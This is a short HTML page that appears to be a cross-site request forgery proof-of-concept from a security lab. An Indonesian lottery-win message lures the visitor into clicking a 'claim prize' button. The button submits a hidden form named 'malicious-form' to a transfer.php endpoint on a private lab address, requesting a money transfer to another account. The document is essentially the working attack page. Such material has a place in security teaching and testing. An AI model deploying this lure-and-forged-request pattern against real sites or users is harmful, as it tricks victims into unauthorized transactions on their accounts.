<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Document</title>
  <style>
    .btn {
      display:inline-block;
      color: white;
      border:1px solid #CCC;
      background:rgb(76, 1, 250);
      cursor:pointer;
      vertical-align:middle;
      max-width: 100px;
      padding: 5px;
      text-align: center;
      border-radius: 10px;
    }
  </style>
</head>
<body>
  <div>Selamat Anda Memenangkan Undian Sebesar Rp. 100.000.000</div>
  <form id="malicious-form" action="http://10.10.11.17/transfer.php" method="POST">
    <input type="hidden" name="to" value="2">
    <input type="hidden" name="amount" value="1">
    <input class="btn" type="submit" name="submit" value="Ambil Hadiah">
  </form>
  <script>
  </script>
</body>
</html>
